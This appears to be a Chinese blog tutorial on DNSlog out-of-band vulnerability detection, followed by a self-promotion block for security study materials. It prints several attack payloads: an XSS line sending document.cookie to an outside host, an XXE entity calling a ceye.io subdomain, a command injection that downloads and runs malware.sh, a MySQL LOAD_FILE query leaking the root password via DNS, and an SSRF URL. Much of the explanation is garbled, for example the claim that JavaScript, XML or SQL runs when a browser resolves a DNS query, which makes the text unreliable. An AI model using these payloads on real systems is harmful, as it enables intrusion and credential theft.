DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗

最新推荐文章于 2024-05-20 14:36:15 发布
最新推荐文章于 2024-05-20 14:36:15 发布
阅读量857 收藏 21
点赞数 9
分类专栏: 程序员 文章标签: 服务器 github git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84973011/article/details/138750704
版权

2.在怀疑有漏洞的地方,输入验证某漏洞的payload

3.返回DNSlog平台查看是否有回显

【此时DNSlog平台给的域名就相当于一个日志文件,如果有回显则证明漏洞存在】

1.DNS解析流程

DNS 解析是将域名转换为 IP 地址的过程。以下是 DNS 解析的基本流程:

  1. 递归查询:首先,客户端向本地 DNS 服务器(也称为递归 DNS 服务器)发出请求,要求解析特定的域名。
  2. 根名称服务器:如果本地 DNS 服务器不知道如何解析该域名,它会向根名称服务器查询。根名称服务器知道所有顶级域名(TLD)服务器的 IP 地址,因此它会将查询转发到相应的 TLD 服务器。
  3. 顶级域名服务器:TLD 服务器知道所有权威 DNS 服务器的 IP 地址,因此它会将查询转发到相应的权威 DNS 服务器。
  4. 权威名称服务器:权威 DNS 服务器知道要解析的域的所有信息,因此它会将 IP 地址返回给 TLD 服务器。
  5. 递归名称服务器:TLD 服务器会将 IP 地址返回给本地 DNS 服务器,然后本地 DNS 服务器会将 IP 地址返回给客户端。
  6. 缓存:在解析过程中,所有 DNS 服务器都会缓存解析结果,以加速后续解析请求。

2.DNSlog介绍

DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。

DNSlog 的工作原理如下:

  1. 攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。
  2. DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。
  3. 攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。

DNSlog 的优点是它可以绕过防火墙和网络安全监控,因为 DNS traffic 通常被视为正常流量。然而,DNSlog 也有一些缺点,例如它可能导致 DNS 服务器过载,并且可能被检测到。

3.DNSlog平台

DNSlog平台是一种用于捕获和分析通过DNS协议传输的数据的工具。它的作用在于帮助安全研究人员、渗透测试人员和网络管理员在漏洞利用和网络安全评估过程中获取有关网络请求和流量的信息。以下是DNSlog平台的主要作用:

  1. 漏洞利用:DNSlog平台可以用于利用某些漏洞,特别是SSRF(Server-Side Request Forgery)漏洞。通过将DNSlog服务器的URL作为恶意请求的一部分,可以捕获并分析发起的请求,了解目标系统的信息,以便进一步渗透或攻击。
  2. 信息收集:通过DNSlog平台,可以获取有关网络请求的信息,例如请求的来源IP地址、User-Agent、请求时间等。这些信息对于分析和了解网络活动、识别潜在的威胁行为以及进行后续的安全调查非常有帮助。
  3. 恶意活动监测:DNSlog平台可以用于监测和发现恶意活动。通过分析DNS请求和响应,可以识别潜在的恶意域名或恶意主机,从而及早发现和应对安全威胁。
  4. 安全评估和渗透测试:在进行安全评估和渗透测试时,DNSlog平台可以用作收集和分析网络请求的工具。它可以帮助评估人员了解目标系统的通信模式、暴露的敏感信息以及可能的漏洞。
  5. 数据分析和研究:DNSlog平台提供了对捕获的DNS请求和响应进行分析的功能。这些数据可以用于研究网络活动、分析攻击趋势、发现新的漏洞或改进安全防御措施。

Burp Collaborator

Burp Collaborator 是 Burp Suite 中的一个插件,可用于执行 DNSlog 测试。它允许您将 Burp Suite 与 DNSLog 平台集成,以便在进行渗透测试时执行 DNSlog 测试。

以下是如何使用 Burp Collaborator 执行 DNSlog 测试:

  1. 配置 Burp Collaborator:首先,您需要在 Burp Suite 中配置 Burp Collaborator。在 Burp Suite 的“项目选项”中,找到“Collaborator”选项卡,然后输入 DNSLog 平台的 URL。
  2. 生成诱饵:在 Burp Suite 中,导航到“Collaborator”选项卡,然后点击“生成诱饵”按钮。这将生成一个唯一的子域名,您可以将其用作 DNSlog 测试的一部分。
  3. 执行 DNSlog 测试:在进行渗透测试时,将生成的子域名插入到 DNS 查询中。然后,Burp Collaborator 会捕获 DNS 响应,并将其显示在 Burp Suite 中。
  4. 分析结果:在 Burp Suite 中,导航到“Collaborator”选项卡,然后点击“事件”选项卡。这将显示所有捕获的 DNS 响应,您可以使用这些信息来确定 DNS 服务器的配置和潜在漏洞。

DNSlog.cn

DNSLog 平台的工作原理如下:

  1. 注册:首先,您需要注册 DNSLog 平台,以获得唯一的用户名和密码。
  2. 生成子域名:在 DNSLog 平台中,生成一个唯一的子域名,您可以将其用作 DNSlog 测试的一部分。
  3. 执行 DNSlog 测试:在进行渗透测试时,将生成的子域名插入到 DNS 查询中。然后,DNSLog 平台会捕获 DNS 响应,并将其显示在 DNSLog 平台中。
  4. 分析结果:在 DNSLog 平台中,您可以查看所有捕获的 DNS 响应,并使用这些信息来确定 DNS 服务器的配置和潜在漏洞。

ceye.io

ceye.io 的工作原理如下:

  1. 注册:首先,您需要注册 ceye.io,以获得唯一的用户名和密码。
  2. 生成子域名:在 ceye.io 中,生成一个唯一的子域名,您可以将其用作 DNSlog 测试的一部分。
  3. 执行 DNSlog 测试:在进行渗透测试时,将生成的子域名插入到 DNS 查询中。然后,ceye.io 会捕获 DNS 响应,并将其显示在 ceye.io 中。
  4. 分析结果:在 ceye.io 中,您可以查看所有捕获的 DNS 响应,并使用这些信息来确定 DNS 服务器的配置和潜在漏洞。

4.DNSlog之混合漏洞利用

DNSlog之xss漏洞利用的实例

XSS(跨站点脚本)漏洞是一种常见的 Web 安全漏洞,它允许攻击者在用户浏览器中执行恶意 JavaScript 代码。XSS 漏洞可能导致用户身份被盗、Cookie 被窃取或其他恶意活动。

如果您发现了一个 DNSlog 漏洞和一个 XSS 漏洞,则可以将这两个漏洞结合起来,进行更有效的攻击。以下是一个实例:

  1. 发现 DNSlog 漏洞:首先,您需要发现一个 DNSlog 漏洞,例如未授权的区域传输或子域取代。
  2. 发现 XSS 漏洞:接下来,您需要发现一个 XSS 漏洞,例如在网站的搜索框中输入恶意 JavaScript 代码。
  3. 将 DNSlog 漏洞与 XSS 漏洞结合:在 DNSlog 漏洞中,将恶意 JavaScript 代码插入到 DNS 查询中。然后,当用户浏览器解析 DNS 查询时,恶意 JavaScript 代码会被执行。
  4. 执行攻击:在执行攻击时,恶意 JavaScript 代码会在用户浏览器中执行,从而实现 XSS 攻击。

例如,攻击者可以在 DNSlog 漏洞中插入以下恶意 JavaScript 代码:

<script>new Image().src='http://example.com/log?data='+document.cookie</script>

当用户浏览器解析 DNS 查询时,恶意 JavaScript 代码会在用户浏览器中执行,从而将 Cookie 发送到攻击者的服务器。

DNSlog之xxe漏洞利用的实例

XXE(XML 外部实体)漏洞是一种常见的 Web 安全漏洞,它允许攻击者读取本地文件或执行其他系统命令。XXE 漏洞可能导致信息泄露、拒绝服务(DoS)或其他恶意活动。

如果您发现了一个 DNSlog 漏洞和一个 XXE 漏洞,则可以将这两个漏洞结合起来,进行更有效的攻击。以下是一个实例:

  1. 发现 DNSlog 漏洞:首先,您需要发现一个 DNSlog 漏洞,例如未授权的区域传输或子域取代。
  2. 发现 XXE 漏洞:接下来,您需要发现一个 XXE 漏洞,例如在 XML 文件中输入恶意 XML 代码。
  3. 将 DNSlog 漏洞与 XXE 漏洞结合:在 DNSlog 漏洞中,将恶意 XML 代码插入到 DNS 查询中。然后,当用户浏览器解析 DNS 查询时,恶意 XML 代码会被执行。
  4. 执行攻击:在执行攻击时,恶意 XML 代码会在用户浏览器中执行,从而实现 XXE 攻击。

例如,攻击者可以在 DNSlog 漏洞中插入以下恶意 XML 代码:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

当用户浏览器解析 DNS 查询时,恶意 XML 代码会在用户浏览器中执行,从而读取本地文件 /etc/passwd

DNSlog之rce漏洞利用的实例

RCE(远程命令执行)漏洞是一种常见的 Web 安全漏洞,它允许攻击者在目标系统上执行系统命令。RCE 漏洞可能导致信息泄露、拒绝服务(DoS)或其他恶意活动。

如果您发现了一个 DNSlog 漏洞和一个 RCE 漏洞,则可以将这两个漏洞结合起来,进行更有效的攻击。以下是一个实例:

  1. 发现 DNSlog 漏洞:首先,您需要发现一个 DNSlog 漏洞,例如未授权的区域传输或子域取代。
  2. 发现 RCE 漏洞:接下来,您需要发现一个 RCE 漏洞,例如在 Web 应用程序中输入恶意命令。
  3. 将 DNSlog 漏洞与 RCE 漏洞结合:在 DNSlog 漏洞中,将恶意命令插入到 DNS 查询中。然后,当用户浏览器解析 DNS 查询时,恶意命令会被执行。
  4. 执行攻击:在执行攻击时,恶意命令会在目标系统上执行,从而实现 RCE 攻击。

例如,攻击者可以在 DNSlog 漏洞中插入以下恶意命令:

;wget http://example.com/malware.sh -O /tmp/malware.sh;chmod +x /tmp/malware.sh;/tmp/malware.sh

当用户浏览器解析 DNS 查询时,恶意命令会在目标系统上执行,从而下载恶意软件 malware.sh 并执行它。

DNSlog之sql漏洞利用的实例

SQL 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在数据库中执行恶意 SQL 语句。SQL 漏洞可能导致信息泄露、数据库损坏或其他恶意活动。

如果您发现了一个 DNSlog 漏洞和一个 SQL 漏洞,则可以将这两个漏洞结合起来,进行更有效的攻击。以下是一个实例:

  1. 发现 DNSlog 漏洞:首先,您需要发现一个 DNSlog 漏洞,例如未授权的区域传输或子域取代。
  2. 发现 SQL 漏洞:接下来,您需要发现一个 SQL 漏洞,例如在 Web 应用程序中输入恶意 SQL 语句。
  3. 将 DNSlog 漏洞与 SQL 漏洞结合:在 DNSlog 漏洞中,将恶意 SQL 语句插入到 DNS 查询中。然后,当用户浏览器解析 DNS 查询时,恶意 SQL 语句会被执行。
  4. 执行攻击:在执行攻击时,恶意 SQL 语句会在数据库中执行,从而实现 SQL 攻击。

例如,攻击者可以插入以下恶意 SQL 语句:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

DNSlog之ssrf漏洞利用的实例

  1. 首先,你需要一个可用的DNSlog服务器。你可以使用第三方DNSlog服务,也可以自己搭建一个。假设你已经有了一个DNSlog服务器,其域名为dnslog.example.com
  2. 接下来,你需要找到一个存在SSRF漏洞的目标应用程序。假设目标应用程序有一个功能,允许用户输入URL并下载远程文件。该功能可能的代码类似于以下示例:

python

import requests

def download_file(url):
    response = requests.get(url)
    return response.content

url = request.args.get('url')
file_data = download_file(url)
save_file(file_data)
  1. 利用SSRF漏洞,你可以构造一个恶意URL,将其作为参数传递给目标应用程序。你可以使用DNSlog服务器的URL作为恶意URL的主机部分,以便在应用程序发起请求时捕获请求信息。以下是一个示例恶意URL:
http://targetapp.com/download?url=http://dnslog.example.com

在这个示例中,你将http://dnslog.example.com作为参数传递给目标应用程序的下载功能。应用程序会尝试下载该URL对应的内容。

  1. 当目标应用程序发起请求时,它会向dnslog.example.com发起DNS请求以解析该主机名。

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

…(img-ZHxwq0Dp-1715485564541)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84973011
关注
  • 9
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1771
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
ICMP timestamp请求响应漏洞 修复 Traceroute探测漏洞 修复 linux 7
04-09
Traceroute探测漏洞 修复 使用firewall-cmd打开关闭防火墙与端口 linux 7 ICMP timestamp请求响应漏洞 修复 Traceroute探测漏洞 修复 使用firewall-cmd打开关闭防火墙与端口 linux 7 ICMP timestamp请求响应漏洞 ...
DNS服务器访问日志
weixin_46356409的博客
11-16 1484
DNS服务器访问日志的目录位置取决于具体使用的DNS服务器软件和操作系统。如果您使用的是其他DNS服务器,请参阅相应的文档以获取正确的配置信息。要配置DNS服务器访问日志,您需要编辑DNS服务器的配置文件。BIND DNS服务器访问日志记录了DNS服务器处理的每个查询请求。文件中记录DNS服务器访问日志。您可以根据需要调整日志文件的路径、版本数量和大小。只记录error日志,没有访问日志,定位不到具体访问DNS服务器的主机。文件中记录DNS服务器访问日志。文件中记录DNS服务器访问日志。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
05-20 412
创新蓝队-针对DNSlog数据外带攻击的应急与预防
DNSlog使用
shangMD01的博客
12-04 898
打开dnslog平台: 点击Get SunDomain获取域名并复制: 复制完打开新网页并粘贴在url上访问,在DNSlog网页内刷新,就会出现一条DNS记录:
linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网
weixin_35094408的博客
05-13 1223
摘要linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚...
Fvuln漏洞探测tools
最新发布
06-27
在IT安全领域,漏洞探测是至关重要的一个环节,它能够帮助我们发现系统、网络或应用程序中的潜在弱点,以便及时修复,防止被恶意攻击者利用。"Fvuln漏洞探测tools"显然是一款专注于这一任务的专业工具,可能包含了...
面向路由器的漏洞探测技术研究
01-27
随着国内信息技术的迅猛发展,网络的规模和应用场景不断扩大和延伸,不论...文章中探讨了目前路由器面临的安全问题,提出并实现了基于漏洞库匹配的路由器漏洞探测技术,最后验证证明该方法具有发现路由器漏洞的能力。
zjcoj.zip_locationn2k_漏洞扫描_系统/网络安全
07-15
通过对ECPage、tDib等源文件的学习和研究,开发者能够理解漏洞扫描的基本流程,掌握如何利用设备上下文和位图数据进行系统安全检查,并且有可能扩展到其他类似的漏洞检测场景。这对于提升网络安全防护能力,尤其是...
利用python实现对web服务器的目录探测的方法
09-19
主要介绍了利用python实现对web服务器的目录探测的方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
DNSLog漏洞
shirlly_的博客
04-17 542
DNS(Domain Name System)是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息,如源IP地址、查询的域名、查询类型(如A记录、MX记录)以及从DNS服务器接收到的响应。没有回显的情况下怎么办?利用限制利用DNSLog服务中的漏洞进行数据窃取攻击。攻击者可以通过在受害者系统上植入恶意代码,使其发送DNS请求到恶意控制的DNSLog服务器
DNSlog漏洞探测
2301_80661529的博客
03-16 1691
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器DNS 服务器DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
使用DNSLog进行盲打
谢公子的博客
04-28 5915
在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些鸡肋。针对此类问题,我们可以使用DNSLOG来进行突破。DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显。 参考文章:使用DNSLOG拯救你的盲打盲注 ...
dnslog在mysql在linux_DNSLog在MySQL注入中的实战
weixin_32540913的博客
03-03 250
关于DNSlog在Web攻击的利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRFDNSlog攻击的基本原理作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我...
dnslog是怎么被黑客利用的
ningyanggege的博客
09-09 3841
dnslog
DNSLog漏洞探测(六)之SSRF漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 765
但是如果该处没有回显,那么就该利用DNSLog平台来解决无回显的问题了,首先我们打开DNSLog服务平台,点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 72uj0g.dnslog.cn。接下来我们构造如下的payload提交,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了,通过file协议去触发我们的payload。接下来我们只需要提交以下的payload,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了。
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 4886
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
05-23
SSRF(Server-Side Request Forgery)是一种常见的Web安全漏洞,常被用于攻击内部网络,获取敏感信息等。而MySQL SSF漏洞则是一种特殊的SSRF漏洞,可以通过构造恶意请求,向MySQL数据库发送任意数据请求,导致数据库的敏感信息泄露或者被攻击者利用进行内网探测、打redis等操作。 下面是一个简单的漏洞利用代码: ```python import requests # 构造恶意请求 payload = 'http://127.0.0.1:3306/select%20@@version' # 发送请求 url = 'http://localhost/ssrf.php?url=' + payload response = requests.get(url) # 输出结果 print(response.text) ``` 上面的代码中,我们构造了一个恶意请求,通过在URL参数中传入payload,来向MySQL数据库发送查询语句,获取数据库版本信息。 如果漏洞存在,并且服务器端没有对URL参数进行严格的过滤和校验,那么攻击者就可以通过构造各种恶意请求,向内部网络发送各种数据请求,获取敏感信息,或者进行内网探测、打redis等操作。 为了防止MySQL SSF漏洞的利用,我们需要在服务器端对URL参数进行严格的过滤和校验,避免攻击者构造恶意请求进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值